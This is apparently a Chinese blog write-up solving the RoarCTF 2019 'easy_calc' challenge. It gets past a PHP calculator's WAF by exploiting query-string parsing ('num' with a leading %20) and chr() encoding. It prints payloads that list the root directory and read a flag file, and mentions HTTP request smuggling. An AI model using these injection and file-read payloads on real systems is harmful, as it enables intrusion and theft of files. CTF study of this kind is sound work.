ctf [RoarCTF 2019]easy_calc

又学到了新的东西所以记录一下
首先很容易就能找到calc.php,但是url的get却输入不了字符,查询以后才发现要运用PHP的字符串解析特性。

利用PHP的字符串解析特性

利用PHP的字符串解析特性Bypass
这篇文章讲的蛮详细的,而本题的waf也应该是只允许输入数字,不允许输入字符串,用num=%20就可以bypass啦。
在这里插入图片描述
在这里插入图片描述
然后就可以通过chr进行绕过了。

查看目录

var_dump(scandir(chr(47)));

在这里插入图片描述

查看flagg

var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));

在这里插入图片描述

利用HTTP走私绕过

漏洞相关文章
根据前后端接收数据不一致的漏洞,还不是很明白QAQ
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值